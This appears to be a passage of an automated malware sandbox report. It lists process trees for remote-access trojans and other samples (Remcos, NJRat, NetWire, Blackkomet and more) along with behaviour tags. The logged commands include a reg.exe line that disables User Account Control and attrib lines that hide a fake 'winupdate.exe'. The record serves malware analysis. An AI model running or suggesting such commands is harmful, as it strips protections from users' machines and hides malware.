        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc56216A50CC5F4AB1BF5E175C5A2D120.TMP"
        6⤵
        
        PID:4648
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rtkkqpk7.cmdline"
        5⤵
        
        PID:2056
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD87F1616953E4E70954130A8D97B4D5.TMP"
        6⤵
        
        PID:3116
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fwbdd8oh.cmdline"
        5⤵
        
        PID:4316
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D84.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4812929BDBDA41E19F1D1776B759D6AA.TMP"
        6⤵
        
        PID:2848
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c_w-thuq.cmdline"
        5⤵
        
        PID:4728
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2340.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9A5C26B35DA34277B8F025F919F428E0.TMP"
        6⤵
        
        PID:856
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\r-hmmjit.cmdline"
        5⤵
        
        PID:2548
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C87.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcADE9D5C872D2490E8EEE54DF1067998C.TMP"
        6⤵
        
        PID:1476
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oj_k0id1.cmdline"
        5⤵
        
        PID:6084
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36C8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE01874637A1E4087A15F117BE32C94C3.TMP"
        6⤵
        
        PID:1344
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0lnpadpa.cmdline"
        5⤵
        
        PID:4408
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40FA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8C198BD239064231B441F92D8A767BB.TMP"
        6⤵
        
        PID:5220
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\er8hncqi.cmdline"
        5⤵
        
        PID:4256
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48F9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5688819A4FF2442891195AA287D89ED.TMP"
        6⤵
        
        PID:1504
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_opwxepy.cmdline"
        5⤵
        
        PID:3028
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51B3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4771E30B180B4D748FABA3561CF7431.TMP"
        6⤵
        
        PID:3452
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\urifwzex.cmdline"
        5⤵
        
        PID:6324
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62F9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcADA73873FDA84A01AD3D13326CEBFC6B.TMP"
        6⤵
        
        PID:6760
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uwtcb_h2.cmdline"
        5⤵
        
        PID:7024
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C4F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1F4137CF321B418DA4AB1B89C3C730.TMP"
        6⤵
        
        PID:6192
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\klwdenvo.cmdline"
        5⤵
        
        PID:2848
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES745E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA4765F85A7DF43B0B0255D6DC758BFD5.TMP"
        6⤵
        
        PID:6560
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wf0-qnu2.cmdline"
        5⤵
        
        PID:6240
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EDD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE8AABE6CF5DD43E4BF92B72732854486.TMP"
        6⤵
        
        PID:7112
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bvnl4btt.cmdline"
        5⤵
        
        PID:6392
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A18.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5FE94E6DF6344A518AFAB9EBE33F6D27.TMP"
        6⤵
        
        PID:6868
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zj_z24el.cmdline"
        5⤵
        
        PID:4736
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9459.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE1B26190166141CE9AB3B0E3388C411C.TMP"
        6⤵
        
        PID:5020
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xpwu3lre.cmdline"
        5⤵
        
        PID:7104
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D62.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1F9B1324747F4271B2FD9E1C1B8AF77.TMP"
        6⤵
        
        PID:5936
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q-uxbonb.cmdline"
        5⤵
        
        PID:6736
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA88D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc622508075A14466B045B44BAE1F1C2.TMP"
        6⤵
        
        PID:6884
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3aomlu4j.cmdline"
        5⤵
        
        PID:6532
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA02.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc85CB0F5D292442F5BAFCC2449B7F22A1.TMP"
        6⤵
        
        PID:5808
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-mllczng.cmdline"
        5⤵
        
        PID:7668
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC388.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc10DAEFC14DA44B0089F9D62E4F32EA95.TMP"
        6⤵
        
        PID:8180
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2ax82dsc.cmdline"
        5⤵
        
        PID:7392
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD143.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCE337E4722934157BA314CD0C21B782D.TMP"
        6⤵
        
        PID:8016
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sbmlyk0w.cmdline"
        5⤵
        
        PID:2268
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5B3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE77BAF6AA2964ED495E335876F268CF.TMP"
        6⤵
        
        PID:8416
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j7xyn1ng.cmdline"
        5⤵
        
        PID:9012
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE10.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0AEB7433CD8412DB8841A9AA33E6D6B.TMP"
        6⤵
        
        PID:8508
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\em1otfdp.cmdline"
    3⤵
    PID:4780

C:\Users\Admin\Desktop\New folder\HawkEye.exe
"C:\Users\Admin\Desktop\New folder\HawkEye.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3344

C:\Users\Admin\Desktop\New folder\NetWire.exe
"C:\Users\Admin\Desktop\New folder\NetWire.exe"
1⤵
- Chimera
- Executes dropped EXE
- Drops file in Program Files directory
PID:2756
- C:\Users\Admin\Desktop\New folder\NetWire.exe
  "C:\Users\Admin\Desktop\New folder\NetWire.exe"
  2⤵
  - Executes dropped EXE
  PID:4624

C:\Users\Admin\Desktop\New folder\NJRat.exe
"C:\Users\Admin\Desktop\New folder\NJRat.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Users\Admin\Desktop\New folder\Remcos.exe
"C:\Users\Admin\Desktop\New folder\Remcos.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4856
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:4236
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
  2⤵
  PID:1576

C:\Users\Admin\Desktop\New folder\RevengeRAT.exe
"C:\Users\Admin\Desktop\New folder\RevengeRAT.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4680
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:348

C:\Users\Admin\Desktop\New folder\Remcos.exe
"C:\Users\Admin\Desktop\New folder\Remcos.exe"
1⤵
- Executes dropped EXE
PID:5292

C:\Users\Admin\Desktop\New folder\Remcos.exe
"C:\Users\Admin\Desktop\New folder\Remcos.exe"
1⤵
- Executes dropped EXE
PID:5372

C:\Users\Admin\Desktop\New folder\NJRat.exe
"C:\Users\Admin\Desktop\New folder\NJRat.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5300

C:\Users\Admin\Desktop\New folder\NetWire.exe
"C:\Users\Admin\Desktop\New folder\NetWire.exe"
1⤵
- Executes dropped EXE
PID:1560
- C:\Users\Admin\Desktop\New folder\NetWire.exe
  "C:\Users\Admin\Desktop\New folder\NetWire.exe"
  2⤵
  - Executes dropped EXE
  PID:3560

C:\Users\Admin\Desktop\New folder\DanaBot.exe
"C:\Users\Admin\Desktop\New folder\DanaBot.exe"
1⤵
- Executes dropped EXE
PID:5760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 300
  2⤵
  - Program crash
  PID:4360

C:\Users\Admin\Desktop\New folder\Curfun.exe
"C:\Users\Admin\Desktop\New folder\Curfun.exe"
1⤵
- Executes dropped EXE
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5760 -ip 5760
1⤵
PID:5872

C:\Users\Admin\Desktop\New folder\RevengeRAT.exe
"C:\Users\Admin\Desktop\New folder\RevengeRAT.exe"
1⤵
PID:5472
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:1416
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:2496

C:\Users\Admin\Desktop\New folder\Remcos.exe
"C:\Users\Admin\Desktop\New folder\Remcos.exe"
1⤵
PID:1332

C:\Users\Admin\Desktop\New folder\NJRat.exe
"C:\Users\Admin\Desktop\New folder\NJRat.exe"
1⤵
PID:4948

C:\Users\Admin\Desktop\New folder\NetWire.exe
"C:\Users\Admin\Desktop\New folder\NetWire.exe"
1⤵
PID:1008
- C:\Users\Admin\Desktop\New folder\NetWire.exe
  "C:\Users\Admin\Desktop\New folder\NetWire.exe"
  2⤵
  PID:3220

C:\Users\Admin\Desktop\New folder\DanaBot.exe
"C:\Users\Admin\Desktop\New folder\DanaBot.exe"
1⤵
PID:6124
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 264
  2⤵
  - Program crash
  PID:2708

C:\Users\Admin\Desktop\New folder\Curfun.exe
"C:\Users\Admin\Desktop\New folder\Curfun.exe"
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6124 -ip 6124
1⤵
PID:4408

C:\Users\Admin\Desktop\New folder\ChilledWindows.exe
"C:\Users\Admin\Desktop\New folder\ChilledWindows.exe"
1⤵
PID:5372

C:\Users\Admin\Desktop\New folder\butterflyondesktop.exe
"C:\Users\Admin\Desktop\New folder\butterflyondesktop.exe"
1⤵
PID:3548
- C:\Users\Admin\AppData\Local\Temp\is-8PK6S.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-8PK6S.tmp\butterflyondesktop.tmp" /SL5="$203A4,2719719,54272,C:\Users\Admin\Desktop\New folder\butterflyondesktop.exe"
  2⤵
  PID:5672
- - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
    "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    PID:112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:7456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd584b3cb8,0x7ffd584b3cc8,0x7ffd584b3cd8
      4⤵
      PID:7632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,13993812316158683964,17693434830602370800,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
      4⤵
      PID:8124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,13993812316158683964,17693434830602370800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
      4⤵
      PID:8128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,13993812316158683964,17693434830602370800,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
      4⤵
      PID:6736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,13993812316158683964,17693434830602370800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
      4⤵
      PID:952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,13993812316158683964,17693434830602370800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
      4⤵
      PID:8008

C:\Users\Admin\Desktop\New folder\Blackkomet.exe
"C:\Users\Admin\Desktop\New folder\Blackkomet.exe"
1⤵
PID:2992
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Desktop\New folder\Blackkomet.exe" +s +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:1020
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Desktop\New folder" +s +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:5540
- C:\Windows\SysWOW64\Windupdt\winupdate.exe
  "C:\Windows\system32\Windupdt\winupdate.exe"
  2⤵
  PID:3596
- - C:\Windows\SysWOW64\notepad.exe
    notepad
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1932
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Windows\SysWOW64\Windupdt" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2128
- - C:\Windows\SysWOW64\Windupdt\winupdate.exe
    "C:\Windows\system32\Windupdt\winupdate.exe"
    3⤵
    PID:4632
  - - C:\Windows\SysWOW64\notepad.exe
      notepad
      4⤵
      PID:5952
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3040
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt" +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2960
  - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
      "C:\Windows\system32\Windupdt\winupdate.exe"
      4⤵
      PID:3932
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:4948
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4912
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1516
    - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        5⤵
        
        PID:1068
      - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        6⤵
        
        PID:5536
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1396
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4188
      - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        6⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:856
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        7⤵
        Sets file to hidden
        
        PID:4112
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2780
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        7⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        8⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5220
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5152
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        8⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        9⤵
        
        PID:6772
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6792
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6808
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        9⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        10⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 92
        11⤵
        Program crash
        
        PID:6656
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6448
        
        C:\Windows\SysWOW64\attrib.exe
        
